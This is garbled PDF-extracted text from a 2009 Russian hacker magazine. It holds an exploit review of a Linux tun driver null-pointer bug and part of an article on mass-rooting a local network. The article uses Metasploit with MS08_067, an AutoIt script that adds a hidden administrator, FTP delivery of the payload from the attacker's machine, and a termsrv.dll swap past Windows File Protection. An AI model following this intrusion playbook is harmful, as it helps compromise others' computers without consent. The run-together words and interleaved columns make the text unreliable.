17 июлясегогодаизвестныйэкспертпобезопасности*Nix-систем, автор модуляgrsecurity Brad Spengler опубликовалописаниеиPoC весьма необычногоэксплойтаподпоследниеядраLinux.
Необычнымявляетсято, чтоприанализеисходногокодаядраLinux эту багупрактическиневозможнообнаружитьневооруженнымглазом. Итак, уязвимыйкодкроетсявреализацииnet/tun из-заошибкиразымено- ваниянулевогоуказателявфункцииtun_chr_pool() файлаdrivers/net/tun.c:
|
|
4440 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|
|||
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|
|||
|
|
|
|
to |
|
|
|
|
|
обзор |
обзор |
|
|
|
|
|
|
|
|
|
|
|
|||
w |
|
|
|
|
|
|
|
|
m |
|||
w Click |
|
|
|
|
|
o |
эксплоитов |
эксплоитов |
||||
|
w |
|
|
|
|
|
|
|
|
|||
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
XSS ВДВИЖКЕMEDIAWIKI
УМИРАЮЩИЙОГНЕЛИС
struct sock *sk = tun->sk; // initialize sk with tun->sk
...
if (!tun)
return POLLERR; // if tun is NULL return error
Объясню, чтоздесьпроисходит: сначалаинициализируетсянекая переменнаяsk иустанавливаетсявзначение, котороеможетбыть равнонулю. Затемзначениепеременнойпроверяетсятакимобразом, что, еслионоравнонулю, возвращаетсяошибка. Багапроявитсятолькопослекомпиляцииисходника,таккаквпроцессе оптимизацииэтогокодакомпиляторувидит,чтозначениеозначенной переменнойужедавноприсвоеноипростовырежетблоксif(!tun).
Такоенехитроезлодеяние, проведенноекомпилятором, позволитнам прочитатьизаписатьданныепоадресу0x00000000, которыйзатем можнобудетспокойноперенаправитьвпространствопользователя.
>> Exploits
ОпубликованныйБрэдомСпенглеромэксплойт, атакжевсеего комментариикэтойзнаменательнойбагенаанглийскомязыкеты можешьскачатьпоадресуhttp://milw0rm.com/exploits/9191.
>> Targets |
: |
|
Реклама |
Linux kernel <= 2.6.30 (ядродолжнобытьсобраносопциейGCC |
|
||
-fdelete-null-pointer-checks). |
|
||
|
|
||
>> Solution: |
|
|
|
ДляисправленияэтойидругихуязвимостейядраЛинуксанезабывай |
|
||
регулярнопроверятьGIT-репозиторийпроизводителя: http://git. |
|
||
kernel.org. z |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
XÀÊÅÐ 08 /128/ 09
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
>>m |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
w Click |
to |
|
|
|
взлом |
|
|
|
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
. |
|
|
|
|
|
.c |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
START
АВТОСПЛОЙТM0R0 / M0R0@INBOX.RU /
КАКОБРАЗЖИЗНИ
МАССРУТИНГ ВЛОКАЛЬНОЙ СЕТИ
Чтоделать, еслихочетсявсегоисразу, даещеиненапрягатьсяпри этом? Правильно, надонайтитого, ктосделаетвсезатебя. Так
ивхакпроме— нехочешьвыполнятьрутиннуюработу, используй средстваавтоматизации. Благо, естьMetasploit, голованаплечах
инемногофантазии.
>> взлом
Как-торазуменявозниклаидеясоздать |
позволяябыстропроверитьмашинкии, по |
калкеибылприятноудивлен. Болеечетверти |
портативнуюверсиюметасплойта. Зачем? |
возможности, ихполомать. Конечно, не0-day, |
машинвыбросилирутовыешеллы. |
Ну, представь, чтотыпоруталкакой-нибудь |
нотемнеменее. Вобщем-то, еслинебрать |
Ещебольшеобрадовалтотфакт, чтосам |
узелвлокалкеизахотелосьтебеокинуть |
врасчетустановкуnmap и, соответственно, |
эксплойтмогбыбытьидругим. Толькоза |
пристальнымвзглядомвсюсетьизнутри. Явно |
winpcap, проблемссозданиемпортатив- |
2009 годMicrosoft ужеопубликовалапорядка |
нужнапомощьввидевсевозможныхx-tool'z, |
нойсборкинебыло. Нотутянаткнулсяна |
20 критическихуязвимостей. Однаизних— |
которыенадоустановить, настроитьит.д. Они |
EasyHack отSKVOZ (zзамай2009) — про |
ms09-001 — такжесвязанасSMB. Эксплойта |
начнутследитьивсяческигадитьвсистеме. |
реализациюмассрутингаспомощьюметас- |
поднеепоканет, но, возможно, этотолько |
Вобщем, форменноепалево, хотявсезависит |
плойта. Темаменядикозаинтересовала, ия |
вопросвремени. |
отконкретныхобстоятельств. Гораздокруче |
решилееразвить. |
Однаконевсетаксладко. Нарисовалосьне- |
иметьпортативныеверсии, которыеможно |
Честносказать, сметасплойтомядоэтого |
сколькопроблем, которыетребовалирешения. |
настроитьзаранееитупоскопироватьна |
особенноинеработал. Так, баловалсяразными |
Допустим, утебяестьшелл. Классикажанра |
тачку. Есливсеправильносделать, нигдеони |
сплойтами, недальшеuser guide. Ноидеямас- |
требуетсозданияновогопользователяидобав- |
тебяневыдадут, апоокончаниизлостных |
срутингареальнозацепила. Болеетого, уменя |
ленияеговлокальнуюгруппуадминистраторов |
действийихнужнобудетпростоудалить. |
былостойкоеощущение, чтопослеэпидемии |
(илиснятияхешейпаролей, илипростозамены |
МЕТАСПЛОЙТ— XP |
conficker найтитачкисюзабельнойдыркой |
паролялокальногоадмина). Вроссийских |
проблематично. Напомню, чтоSKVOZ предла- |
реалияхподавляющеебольшинствомашин |
|
— MS08_067 — DB_UTOPWN |
галиспользоватьсвязкуnmap иметасплойт |
влокалке(яговорюоклиентскихтачкахпод |
Вджентльменскомнаборепентестерамета- |
какраздлямассрутингадырыMS08_067. Ради |
WinXP) работаютподлокализованнойосью, а, |
сплойтзанимаетотнюдьнепоследнееместо, |
интересаяповторилэкспериментвсвоейло- |
значит, локальнаягруппаноситназвание«Ад- |
046 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|||||||||||||
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
w Click |
to |
|
|
|
|
m |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||
w |
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
>>
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
взломw |
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
||||
|
|
|
|
|
o |
m |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ГЕРОЙДНЯ— МЕТАСПЛОЙТC ЭКСПЛОЙТОМMS08_067
министраторы». Попробуйвбитьвудаленной |
ВызовTraySetState спараметром2 блокирует |
доступизконсоливвинде— совсемнетак |
|
консоли«Администраторы» итебянакроет |
появлениеиконкиAutoIT втрее. Далееопре- |
крутокаквниксах, большинствоутилпросто |
|
глубочайшеечувствообиды. Да-да, извечная |
деляетсяимягруппыадминистраторов, созда- |
небудутработатьбезграфики. Такчто, будем |
|
проблемаскодировками. Консольработает |
етсяпользовательидобавляетсявэтугруппу. |
шаманитьвпопыткеоткрытьдоступкрабоче- |
|
подcp866, Windows — подcp1251, никсыи |
Последнийвызовмодифицируетреестр, |
мустолу. Вариантов, впринципе, всегодва. |
|
вовсеподKoi8-r илиUnicodе. Метасплойтже |
чтобыпользовательотсутствовалвспискеин- |
Это— расшариваниестола(типаRadmin, VNC |
|
инагрузки, типаmeterpreter, впринципене |
терактивноговходаXP. Компилируемскриптв |
ит.д.) ииспользованиетерминальныхслужб. |
|
понимаютрусскуюлокаль. Отсюданаровном |
exe-файлипроверяемнавиртуалке. Есливсе |
Первыйдляклиентскихмашин— совсеми |
|
местемыполучаемнехилуюпроблему. |
впорядке, двигаемсядальше. |
невариант, ибооченьпалится. СRDP вXP |
|
Всеткеэтатемадостаточноширокообсужда- |
Вкачестветранспортапоначалуядумалис- |
вообщетухло: приинициацииудаленного |
|
ется. Вконечномитогевсессылаютсянаодин |
пользоватьSMB. Мынаходимсявтойжесетке, |
подключениялокальныйпользовательбудет |
|
итотжепатч(trac.metasploit.com/ticket/253). Я |
чтоижертва, — такпочемубынерасшаритьу |
выброшенизактивнойсессии. Ноненадо |
|
накладывалпатч, пробовалразныекодиров- |
себяпапкуинеподложитьтудафайликuser. |
отчаиваться, выходесть. |
|
ки, ноничертанеполучилось. Может, полу- |
exe? Невидяникакихпроблем, ятакипос- |
РАЗРУШИТЕЛИЛЕГЕНД |
|
читсяутебя, номеняэтапроблемаоконча- |
тупил. Номонтированиепапкисудаленной |
||
тельнодобила, иярешилискатьнормальное |
системынивкакуюнеполучалось— видимо, |
ЧемдумаютребятаизRedmond'а, янезнаю, |
|
решение. |
послеэксплуатациисервисначиналработать |
нопоройихрешенияпоражаютвоображение. |
|
СКАЖИМНЕ, |
неправильно. Нудаладно, ввиндепоумолча- |
ЕсливсерверныхОСмыимеемчеловеческий |
|
ниювстроенконсольныйклиентftp. Яподнял |
доступпоRDP, товклиентских— полнаялажа. |
||
КАКТЕБЯЗОВУТ |
натачкеftp-сервер(портативныйFileZilla), на- |
УдаленныйдоступвXP неуживаетсяслокаль- |
|
Итак, всталазадачадобавленияпользова- |
строиланонимныйвход, анаудаленнойтачке |
ным, итолькоодинизпользователейможет |
|
телявлокальнуюгруппуадминистраторов |
впапке%temp% строказастрокойпрописал |
оставатьсяактивным(вHome Edition, кстати, |
|
посредствомполученнойконсоливусловиях |
ftp-скриптдляподключениякмоемусерваку |
терминальнойслужбывообщенет). Зачемэто |
|
невозможностииспользоватьсимволыкирил- |
иполученияфайла. Далеевконсолипоявился |
сделано— большаязагадка, потомучтовряд |
|
лицы. Пландействийтаков: пишемскрипт, |
вызовftp.exe сключом-s, ифайлuser.exe ока- |
ликто-тобудеттолькоиз-заэтогопокупать |
|
реализующийнеобходимыйфункционал, ка- |
залсянапредназначенномемуместе. После |
сервернуюось, анеудобствдоставляетнеме- |
|
ким-тообразомзаливаемегонаподопытную |
запускавсистемепоявилсяпользовательс |
ряно, особенновнашемслучае. |
|
тачкуиисполняем. Скриптыяпредпочитаю |
нужнымиправами. |
Водномизбета-релизовXP такогоогра- |
|
писатьнаAutoIT, такчтооткрываемSciTe из |
Такимобразом, принципиальнопроблема |
ничениянебыло, поэтомудляегоснятия |
|
поставкиAutoIT иначинаемваять. Приэтом |
решаетсянесложно. Впрочем, чемдальше, |
достаточноподменитьбиблиотекуtermsrv.dll |
|
хотелосьбысделатьверсиюскрипта, неза- |
тембольшехочется. Вбиватькаждыйраз |
иперезагрузиться. Насловахпросто, наделе |
|
висящуюотлокали, — тоестьскриптдолжен |
FTP’шныйскрипт, качатьизапускатьфайл |
— нет. Всетиразличныхпатчеров, какгрязи, |
|
уметьавтоматическиопределятьназвание |
— идеологическикрайнедалекоотпостав- |
новсеониработают, прямоскажем, хреново, |
|
локальнойгруппыадминистраторов. |
леннойзадачиавтосплойтинга. Крометого, |
даито— толькоеслиихзапускатьизинтер- |
|
Известно, чтосистемныегруппыввинде |
|
|
|
имеютпредопределенныеSID, вчастности, |
|
|
|
|
|
|
|
SID группыадминистраторовимеетзначе- |
|
|
|
ниеS-1-5-32-544. Дляполученияназва- |
|
|
|
нияпоSID предоставляетсяAPI-функция |
|
|
|
LookupAccountName, экспортируемаябибли- |
|
|
|
отекойAdvAPI32.dll. ВавтоитмодульSecurity. |
|
|
|
au3 предоставляетсоответствующуюфунк- |
|
|
|
цию-обертку_Security__LookupAccountName. |
|
|
|
Этойфункциеймыивоспользуемся(смотри |
|
|
|
файлuser.au3 наDVD). |
|
|
|
|
|
|
|
XÀÊÅÐ 08 /128/ 09 |
047 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
>>m |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
w Click |
to |
|
|
|
|
взлом |
|
|
|
|
|
|
|
|
|
|||||||||||||
|
|
|
|
|
|
|
|
|||||||||||||||||||||
w |
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
XP УПОРНОСОПРОТИВЛЯЕТСЯЗАМЕНЕСИСТЕМНЫХФАЙЛОВ
HTTP://WWW
links
Присозданияавтосплойтанеобойтись безметасплойта: metasploit.org.
DVD |
dvd
Надискетынайдешь:
•Исходныекоды скриптаfinal.au3.
•«Правильную» версиюбиблиотеки termsrv.dll.
•Конечныйбинарник ввидесамораспаковываемогоархива.
•Пропатченные исходникиметасплойта, атакжесами патчи.
активнойсессииииметьдоступкрабочемустолу. Делов том, чтосистемныеdll охраняютсясистемойWindows File Protection. Еслидоступенустановочныйдистрибутив(сCD илипосети), файлыбудутавтоматическизамененынаоригинальные. Еслинет, будетвыброшенопредупреждение онедоступностидискаипредложениевставитьдисклибо принятьновыйфайл. Ихотяназваниефайланепишется, надобытьполнымдауном, чтобыответить«Да», начтоя, естественно, полагатьсянебуду. Одинизметодовобхода заключаетсявнеобходимостизагрузкивбезопасном режиме, ноудаленно, ксожалению, этогонесделаешь. Поэтомувсепатчерыидутлесом, имыбудемваятьсобственный, которыйподменялбыбиблиотекуизнеинтерактивнойсессии, даиещекак-тосправлялсясзащитойфай- лов. Перваячастьтривиальна, авотсовторойсложнее. Надоотследитьпоявлениеокнаиэмулироватьнажатияна нужныекнопки. Положим, коддляэтогомынаписали, но, запустивегоизконсолиmetasploit, мыдикообломаемся, таккак, неимеядоступакрабочемустолу, окноон, естественно, непоймает, иникакиесигналыпослатьнесможет. Навыручку, какобычно, приходитпланировщикзадач, позволяющийзапускатьпрогивинтерактивномрежиме. Идеявтом, 